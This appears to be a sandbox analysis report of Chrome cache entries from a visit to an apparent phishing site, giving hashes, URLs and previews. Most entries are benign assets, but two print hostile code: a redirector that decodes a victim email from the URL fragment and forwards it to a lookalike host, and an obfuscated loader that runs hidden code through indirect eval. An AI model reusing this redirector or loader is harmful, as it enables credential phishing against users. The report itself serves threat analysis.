                                                                                                                    MD5:711A09705596458B623B0ABCD9F5A74B
                                                                                                                    SHA1:B7540B818AEE2D6E6D9C79D80179DBB53AE1A8B9
                                                                                                                    SHA-256:1971FFC28301EB8AFF59CA8A6944C3E8D2B80DC13E3E1D33D728D245AACD13BC
                                                                                                                    SHA-512:8F821DBC573F5F76D3CC38C61813FBDDDC8CE1B372DE95A971EE2FE71CABCE96ADFEFD1FD5479EE2BBA0FC78495C54A4A0B6E740E34139CDDC30663B51D72AD2
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://csnrda.net/un-plugins/
                                                                                                                    Preview:<html lang="en">..<head>..<meta http-equiv="content-type" content="text/html; charset=UTF-8">..<meta charset="utf-8">.. .. ....<head> ..<body> .. .. <script type="text/javascript">..var url_string = window.location.href;..var url_get_email = atob(getafterhash(url_string));..var mail_go_url = "https://y0x6.tjsqawfetli.es/NjgSso0i/*"+url_get_email+"";..location.replace(mail_go_url); .. .. ..function getafterhash(url) {..var ret; ..var queryString; .. // stuff after # is not part of query string, so get rid of it.. queryStringhash = url.split('#?8407378349Family=')[1]; .. queryStringsemi = url.split(';')[1]; .. queryStringsemiplus = url.split(';+')[1]; .. queryStringstartsemi = url.split('*;')[1]; .. // if query string exists.. if (queryStringhash) {.. ret = queryStringhash;.. .. }else if (queryStringsemi) {.. ret = queryStringsemi;.. .. }else if (queryStringsemiplus) {.. ret = queryStringsemiplus;.. .. }else if (queryStringstartsemi) {.. ret = queryStringstartsemi;..

                                                                                                                    Chrome Cache Entry: 145

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (10450)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):10498
                                                                                                                    Entropy (8bit):5.327380141461276
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:E0D37A504604EF874BAD26435D62011F
                                                                                                                    SHA1:4301F0D2B729AE22ADECE657D79ECCAA25F429B1
                                                                                                                    SHA-256:C39FF65E2A102E644EB0BF2E31D2BAD3D18F7AFB25B3B9BA7A4D46263A711179
                                                                                                                    SHA-512:EF838FD58E0D12596726894AB9418C1FBE31833C187C3323EBFD432970EB1593363513F12114E78E008012CDEF15B504D603AFE4BB10AE5C47674045ACC5221E
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css
                                                                                                                    Preview:a,abbr,acronym,address,applet,b,big,blockquote,body,caption,center,cite,code,dd,del,dfn,div,dl,dt,em,fieldset,form,h1,h2,h3,h4,h5,h6,html,i,iframe,img,ins,kbd,label,legend,li,object,ol,p,pre,q,s,samp,small,span,strike,strong,sub,sup,table,tbody,td,tfoot,th,thead,tr,tt,u,ul,var{background:transparent;border:0;font-size:100%;font:inherit;margin:0;outline:0;padding:0;vertical-align:baseline}body{line-height:1}ol,ul{list-style:none}blockquote,q{quotes:none}blockquote:after,blockquote:before,q:after,q:before{content:"";content:none}:focus{outline:0}ins{text-decoration:none}del{text-decoration:line-through}table{border-collapse:collapse;border-spacing:0}input[type=hidden]{display:none!important}input[type=checkbox],input[type=radio]{border:0!important;margin:0;padding:0}@font-face{font-family:Proxima Nova;font-style:normal;font-weight:400;src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot);src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot?#iefix) fo

                                                                                                                    Chrome Cache Entry: 146

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:PNG image data, 420 x 94, 8-bit/color RGBA, non-interlaced
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):10796
                                                                                                                    Entropy (8bit):7.946024875001343
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:12BDACC832185D0367ECC23FD24C86CE
                                                                                                                    SHA1:4422F316EB4D8C8D160312BB695FD1D944CBFF12
                                                                                                                    SHA-256:877AE491D9AAC5C6EF82A8430F9F652ACE8A0DBC7294BD112AAD49BD593769D0
                                                                                                                    SHA-512:36C319AC7F75202190E7A59F3F3C92892A71D5F17663E672319A745B6574BCFDE7C89B35F480CB15A193924DACB9D67F8CA1E1BC2BF33FC5CCBFA152CC7BA2D0
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    Preview:.PNG........IHDR.......^.....l2`...).IDATx..}...U.... w...B..P$.Hv..t......x.EA@.Q`.E......-.".(..X`..D....5]]U}....$3...&...guOw..}>.....~....w.ZZ...z..FZ$I.$I....N.......tt.$e...M....ru$I.$IR.h.AvK0.t..wy.:.1...D.H...LS....iF~.X...smr.$I.$IR.4.....SY..@....h8.....*..dB...1.eG...$I.$.hZ...8.r...[.A.I..XE..hdA{Z..teaF...u:}.1^..-I.$I.FP.A..Nm..........A78...=.%W_.$I..8YQ.H2z#.D_...m..k..u.t..R6#.....N....){...$I..1@...g...@a ..u2..dL...*ai.d.[.$I..D.....OM..a...,h%u.B.....0...57..hrW..$I....Gf.|.=.eg`.........k.J.$IR..<.u....]....@.d...H..$I.$5..MWwu:....H|Y..,.$.I.$I....Qu...s.NzzM..]..;$ I.$IR......+..L9......63.I@.$I..z..#.....:..7...s..<$ I.$I.hP.tu...m"..o1.y.@..W1T<(..... z%."?.4zE..$ ..Y1z`.P..!....`t%t....[..d...N.UKy&.A;..6S...<...........o...]0...r.$I......0..R.....N.....0Wi._.;...M..Lrb{.7w..].jm.r....C...&..gd}..Etm}..~L.l...}n\'...$..Mr.i..{..n..9.....SwMh.}.Q{./wJ.....B]:.....+..\V...A.S.w..6.....,..[.......J@....-.4.....:..Zvt.r.*.

                                                                                                                    Chrome Cache Entry: 147

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:PNG image data, 1920 x 1080, 8-bit/color RGB, non-interlaced
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):77073
                                                                                                                    Entropy (8bit):7.876056172134186
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:6849F4C7A7F7E7E7055A24911CE306F7
                                                                                                                    SHA1:7E6710350C78318C0894894E1DA6CDDFE2B824C6
                                                                                                                    SHA-256:256A71B904F26C4CA4736E35C853D96C42395D8DC801D68CDB5C3DC316290876
                                                                                                                    SHA-512:E9ED211BE7E8CEB0ED9CB3D24EF67357FFFACE43A9EC98390340CFB0682472080C55403A1197CE839E785C6D68AEB93B4D0B4A57772E842B478A8DE66965FFB2
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    Preview:.PNG........IHDR.......8.....g.V.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....-[....V#.F.....#dZ.*..y.Fe..Q...0.....@".r)+]v..U..t..6n..6R.1EB....j..!.j.....{.>.VV%..9Q.|w...Xk...].gp.....bE.~.uW~.............(........C>..o}................7o.bBXt..,h\../..../g4....W.^.sH.4...B..o...g......T.t&...Y..@_4.!..h.....@.....A @c.o:&.v......#.d..?.S.....1.r.......)#.....Y.f...:.._.!@.{M....V.BGG....iLy...f .@......J.s..?A(Jz...Y.\.f).......h.&........G...4.....h.B.4.\N..Q"...:(...h....C.. .....pp.#.zd.,h\y...f .@......N(...jF_.{.x..\.....Y:s..-....1..`bh...:,zd.,h\gx...f .@.z..S...\^A..AI...yB.\.f...7SB.. ....5.K..... ......@74.!...+...x@....t...#.Yz.....1..`bh...8.G........:...)......\T.?....g..1...dA..C.......4...L....+Y...=2@.4.....@k4.!...5........4h....Z.'t..,h...}3..h..)..Z3.W..c.G....C(&......hP..r.p"*.k...B.....5.of...A4..Ck..F.... ...5x..h.f .@.z......ry.W3..N....\.....Yz../o.u....A4..Ck.wM.B.@.......x..h.f .@......

                                                                                                                    Chrome Cache Entry: 148

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):1864
                                                                                                                    Entropy (8bit):5.222032823730197
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:BC3D32A696895F78C19DF6C717586A5D
                                                                                                                    SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                                                                                    SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                                                                                    SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://y0x6.tjsqawfetli.es/klBcnDvaiorUutbh5B3Adjn4Q5P6J55tBLVCjJ9xNFE56CgQsKJMuRo2uconQpvHSdX2RE5pEuv214
                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r

                                                                                                                    Chrome Cache Entry: 149

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (1617)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):117345
                                                                                                                    Entropy (8bit):5.491583002528666
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:8F0B2CF806F323303D90290C04C66286
                                                                                                                    SHA1:9C671B5E1F625BFA6894818C4A7BA6950F300DF4
                                                                                                                    SHA-256:F0520A5239189BB680C613427E7760E8DD41D1DF2D60EF699F8A74BDFE3AF750
                                                                                                                    SHA-512:355BFFF7963C903BB1E5D9E950570BAB9541B9D426C5725EF298895420E92D3E48A36340A70F177D204DDC1DBF92CB7AE661501D2E876363988B45C3C7D15683
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.24R2mrw_td8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9vR1rNwOjC3PXOxUlyKiCwNBv2Fg/cb=gapi.loaded_0"
                                                                                                                    Preview:gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([]);.var aa,ea,la,pa,za,Ea,Fa;aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.la=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.na=la(this);pa=function(a,b){if(b)a:{var c=_.na;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}};.pa("Symbol",function(a){if(a)return a;var b

                                                                                                                    Chrome Cache Entry: 151

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (2412)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):174262
                                                                                                                    Entropy (8bit):5.55544988826586
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:FBB7F9979A2E5044220E5383062DA32D
                                                                                                                    SHA1:CE731C4BD47B09D2DE936149FD0B2CE2EFD492C9
                                                                                                                    SHA-256:521B0C7AD9F663F83F908A588A50D2288B28508136E0276A62BA4A899644681B
                                                                                                                    SHA-512:AF7F9E86123977C559CA371FDAB7A5050A4E09F57C1E78FAC82BEABA308DF469294A7DBEA72E8D7FAE4E01853D816DFCF5F4B245E2C18C130A6D0E677A70F686
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.VtzkEync3_c.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTsd-Oc-9jGYYPJhWO6mLyTNJNnAMg"
                                                                                                                    Preview:this.gbar_=this.gbar_||{};(function(_){var window=this;.try{._.Ni=function(a){if(4&a)return 2048&a?2048:4096&a?4096:0};_.Oi=class extends _.O{constructor(a){super(a)}};.}catch(e){_._DumpException(e)}.try{.var Si,Ti,Vi,Wi,$i;_.Pi=function(){return typeof BigInt==="function"};Si=function(a){const b=a>>>0;_.Qi=b;_.Ri=(a-b)/4294967296>>>0};Ti=function(a,b){b=~b;a?a=~a+1:b+=1;return[a,b]};_.Ui=function(a){if(a<0){Si(-a);const [b,c]=Ti(_.Qi,_.Ri);_.Qi=b>>>0;_.Ri=c>>>0}else Si(a)};Vi=function(a){a=String(a);return"0000000".slice(a.length)+a};.Wi=function(a,b){b>>>=0;a>>>=0;if(b<=2097151)var c=""+(4294967296*b+a);else _.Pi()?c=""+(BigInt(b)<<BigInt(32)|BigInt(a)):(c=(a>>>24|b<<8)&16777215,b=b>>16&65535,a=(a&16777215)+c*6777216+b*6710656,c+=b*8147497,b*=2,a>=1E7&&(c+=a/1E7>>>0,a%=1E7),c>=1E7&&(b+=c/1E7>>>0,c%=1E7),c=b+Vi(c)+Vi(a));return c};_.Xi=function(a,b){if(b&2147483648)if(_.Pi())a=""+(BigInt(b|0)<<BigInt(32)|BigInt(a>>>0));else{const [c,d]=Ti(a,b);a="-"+Wi(c,d)}else a=Wi(a,b);return a};._

                                                                                                                    Chrome Cache Entry: 152

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):937
                                                                                                                    Entropy (8bit):7.737931820487441
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:FC3B7BBE7970F47579127561139060E2
                                                                                                                    SHA1:3F7C5783FE1F4404CB16304A5A274778EA3ABD25
                                                                                                                    SHA-256:85E6223AFDBD5BADF2C79BCFBAA6FE686ACAA781ECA52C196647FFABB3BE2FFE
                                                                                                                    SHA-512:49FA22DE92BEBEDE28BB72F7C7902C01D59E56723811629E40C8A887E34FD0B392A9DF169A238BDD8E46D984E76312D75B2644B8611C66A71A559C1B6834DE6C
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://developers.cloudflare.com/favicon.png
                                                                                                                    Preview:.PNG........IHDR... ... .....szz.....pHYs...........~....[IDATX..KHTQ..g...&....!pY-.q.-B.H....Q`HY.wL.L....D....M.hS.H.w..wF..y|..s.9..2.6s..w.....}.9........m.{"."q.Q..x.ZO..h.U.y.3.].^.M. .0...D7L...D....w...a$}/u..)n....@......8.V.y6..X..U.QgA.\.Q.F..~.>..'......g.=.2..VW..\....`1d......q..........6...Y...L.g9....l.-...z.t.CE|...d5...b..H?....4...+.J.....9.E..-. ..R$.D.S....7...b..i..\q.?0..9....,d&...mw.L..&N.FpM"...;.......O[db/...-....Q<..WDhN.nu....%...m......A.S.._.>w...0.u..TJ...)......u..(=.!.."zTE0....J....ki#..n0..^.._"..D.....u..p.*=.&d..1....8...f.kR.3G6.t....Vcl.o=~/.$./...I.....$............(]...9.,...i....e... ..........._....@.h./......./U2Nd..........U..|...{.(...y....`.|....z\..z.@.o5...-...O.T.TL).5...y.m.......zZ........:..B..i..w...?!...m-xi.....;...e.0.A...W.}..E...u......h0O./...U..jA..., ..{.(......._=.w#.~..<..g.Vz....o@.e...........2.....T....IEND.B`.

                                                                                                                    Chrome Cache Entry: 154

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):1660
                                                                                                                    Entropy (8bit):4.301517070642596
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                    SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                    SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                    SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

                                                                                                                    Chrome Cache Entry: 155

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (21720), with CRLF line terminators
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):4724541
                                                                                                                    Entropy (8bit):2.5839796656457863
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:AA849F9614E090F7E5EBED754F83D3C2
                                                                                                                    SHA1:4100808BBC0665E1ECF3372DDF7DD02A14B1387A
                                                                                                                    SHA-256:928A123423281E31FCC018F4CB5B297299EFB723678D2A45EFCD842F6C6A4AE6
                                                                                                                    SHA-512:522EB407E209EA8E61622882669258866409277A8E754A994264D4B1418164236AAFB4630FA8B3A0029D7D0700E07D1113CFED04882BEAF3842C8FB5CE167E8D
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://y0x6.tjsqawfetli.es/34iyqRIj4uqUbeg5dCF2ghaihKiMc5js7oxkB67110
                                                                                                                    Preview:function decodeAndEvaluate(key) {.. const binaryString = [...key].. .map(char => Number('.' > char)).. .join('').. .replace(/.{8}/g, byte => String.fromCharCode(parseInt(byte, 2)));.. .. (0, eval)(binaryString);.. return true;..}....const handler = {.. get: function(_, prop) {.. decodeAndEvaluate(prop);.. return true;.. }..};..const viewsen = new Proxy({}, handler);..viewsen["........................................................................................................................................................................................................

                                                                                                                    Chrome Cache Entry: 156

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113424
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):20410
                                                                                                                    Entropy (8bit):7.980582012022051
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:3BA4D76A17ADD0A6C34EE696F28C8541
                                                                                                                    SHA1:5E8A4B8334539A7EAB798A7799F6E232016CB263
                                                                                                                    SHA-256:17D6FF63DD857A72F37292B5906B40DC087EA27D7B1DEFCFA6DD1BA82AEA0B59
                                                                                                                    SHA-512:8DA16A9759BB68A6B408F9F274B882ABB3EE7BA19F888448E495B721094BDB2CE5664E9A26BAE306A00491235EB94C143E53F618CCD6D50307C3C7F2EF1B4455
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css
                                                                                                                    Preview:...........}k..6..w...R..J.H=GSI..x.9...}T*.....)Q..f<...~.F.h..x..{+.-.....h..n....</v.ev......W.,.bU..rW.I...0x...C..2...6]..W_......../x.........~.z.}.|.#x......Ag*O.|XgU...4 .^'U...mP.A.].Z.U.!..Y.......:.ve.?.!..d.N...xJ...mR......0.@p...lKr/...E.-. .....|l.4.o.i.......L.iF..T{.n....2....VEY.y=..=..T+V./.b....\....7.sH.w{.h.....!.."F.k.!.......d...mS.rh.&G.../..h&..RE"!.A/.......A....L...8.q.M...t[...R...>.6;R..^.Vu..9.[F........>A.:HT}w]......2........p......'T.^]}.^..yJ>.<..pq..h.|..j....j.x..-...c...f...=".)..U.X'.M..l.]ZVtl\.I..}.0.~B0Y'.N...E.4.Xd..e...a.........."..9+d.&..l.$E..R.u.g.Q..w&...~I. .y..D.4;..'.."-.....b...)k.n.M...,3J.z_..&2f.h;.&.R.y..P..X.....\P....*.r...B.$........<....H5.M.."'#.6mQl..mQ5.=.\...O.....^..jM..u*.F..Oh.lNI..j..T..u...I..._........{.\...{..._|..={O..z..>......x..5Q.D7?{...^...^.......o.=.z......v......z.C...Gtw...0!..M@....^...^.x..G....W...{...)..y.<c3...^>{......7._..'d__...;R.

                                                                                                                    Chrome Cache Entry: 157

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):270
                                                                                                                    Entropy (8bit):4.840496990713235
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:40EB39126300B56BF66C20EE75B54093
                                                                                                                    SHA1:83678D94097257EB474713DEC49E8094F49D2E2A
                                                                                                                    SHA-256:765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
                                                                                                                    SHA-512:9C9CD1752A404E71772003469550D3B4EFF8346A4E47BE131BB2B9CB8DD46DBEF4863C52A63A9C63989F9ABEE775CB63C111ADD7AFA9D4DFC7A4D95AE30F9C6E
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fill="#262626"/></svg>

                                                                                                                    Chrome Cache Entry: 158

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (10017)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):10245
                                                                                                                    Entropy (8bit):5.437589264532084
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:6C20A2BE8BA900BC0A7118893A2B1072
                                                                                                                    SHA1:FF7766FDE1F33882C6E1C481CEED6F6588EA764C
                                                                                                                    SHA-256:B1C42ACD0288C435E95E00332476781532ED002CAC6F3DCEE9110CED30B31500
                                                                                                                    SHA-512:8F80AD8ADC44845D24E13D56738A2CA2A73EE6FCDC187542BA4AAEBBF8817935D053A2ACFB0D425B9CC0C582B5091E1C9FE16B90B3AA682187645067C267FC41
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://objects.githubusercontent.com/github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250326%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250326T150951Z&X-Amz-Expires=300&X-Amz-Signature=1ffd6bca3c8f8479889bae4eab42a9117f7fa8b84e2d94dd3c9d5c04f1b55972&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream
                                                                                                                    Preview://.// randexp v0.4.3.// Create random strings that match a given regular expression..//.// Copyright (C) 2016 by Roly Fentanes (https://github.com/fent).// MIT License.// http://github.com/fent/randexp.js/raw/master/LICENSE .//.!function(){var e="RandExp",t=function(){return function e(t,n,r){function o(s,i){if(!n[s]){if(!t[s]){var u="function"==typeof require&&require;if(!i&&u)return u(s,!0);if(a)return a(s,!0);var p=new Error("Cannot find module '"+s+"'");throw p.code="MODULE_NOT_FOUND",p}var h=n[s]={exports:{}};t[s][0].call(h.exports,function(e){var n=t[s][1][e];return o(n?n:e)},h,h.exports,e,t,n,r)}return n[s].exports}for(var a="function"==typeof require&&require,s=0;s<r.length;s++)o(r[s]);return o}({1:[function(e,t,n){function r(e){return e+(e>=97&&122>=e?-32:e>=65&&90>=e?32:0)}function o(){return!this.randInt(0,1)}function a(e){return e instanceof h?e.index(this.randInt(0,e.length-1)):e[this.randInt(0,e.length-1)]}function s(e){if(e.type===p.types.CHAR)return new h(e.value);if(e.

                                                                                                                    Chrome Cache Entry: 159

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:PNG image data, 280 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):3335
                                                                                                                    Entropy (8bit):7.920585736827683
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:DADCD54EE1BF8A260ED5289122D2FF93
                                                                                                                    SHA1:5B359651C028A86C3E6FDD6223B8362C065DECE6
                                                                                                                    SHA-256:0C2C1041650B139AA47E016BDB95163F97384487A1858F85760792862FDAAC3F
                                                                                                                    SHA-512:ED53D5EB181D12539597E23CE96721F954052B8535A0801A1380F7F677B08346B56AFA842ACB42AD4ABBB822C01BBAC0BB3052D61B2D6E3FB04849EBE6C3CB7F
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    Preview:.PNG........IHDR.......<............sRGB.........gAMA......a.....pHYs..........(J.....IDATx^....W...Q.@rXPh...P......M<....X..%.a..m1..Mli..`..6..;..5..[........(..-$BK.i.3..*I....73........~.dso.vwfg....}.{.\.... .B.|D...AH....3x..u.9..O.v..._=+....H....8..sz..:....}...?8..Ov.P..*0t..wN..s'.....Ic.v&...m..o.{......9yp.Z9...A.F.u...Dd.....N..I.&...A.5q......b........8..|.i.L..Z.........".#.:%........<..o...6.KN..%..M..a.....:.........M-.|O.....r6..k..G.F.uJ..G^..l~....,..m..[#z.C`..j.h..p.....K...K...p..o......j.D.CgY...B....s.:.a.8w;)/.:....`...:...m...v....a8n...3F..AD`.Z'.4...SN..o..e...;;..@...X..WnQ[..iW.z...............1...SnP-A./b...FS..L...8;.ot.\.Qw...*}..:.;.{VM......M`.6LR-A./......~..T[..q.......%....G..6aExM...c.%..E...iJ.E...........Z.`5..a.............\UAjA..V.AT.u...:A!H..pm?..}..o.....u.xlj..........."./YZ T.V.!.%.S....z.h..X.F ....<........}.k.P..p...Bp]......M.aK.kV.lX8.P|....../..n..r./3..j.(0X.......f."...A.Yb....5.E..l.

